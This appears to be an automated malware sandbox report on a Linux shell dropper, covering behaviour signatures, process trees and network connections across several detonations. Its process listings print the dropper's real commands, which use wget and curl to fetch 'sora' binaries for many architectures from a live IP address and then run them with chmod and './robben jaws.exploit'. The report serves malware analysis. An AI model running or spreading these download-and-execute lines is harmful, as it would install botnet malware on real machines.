Analysis Overview
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
Threat Level: Shows suspicious behavior
The file 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 01:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.17:443 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-armhf-20240611-en
Max time kernel
37s
Max time network
41s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh | N/A |
Processes
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]
/tmp/robben
[./robben jaws.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 01:47
Reported
2024-10-18 01:50
Platform
debian9-mipsbe-20240729-en
Max time kernel
34s
Max time network
33s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
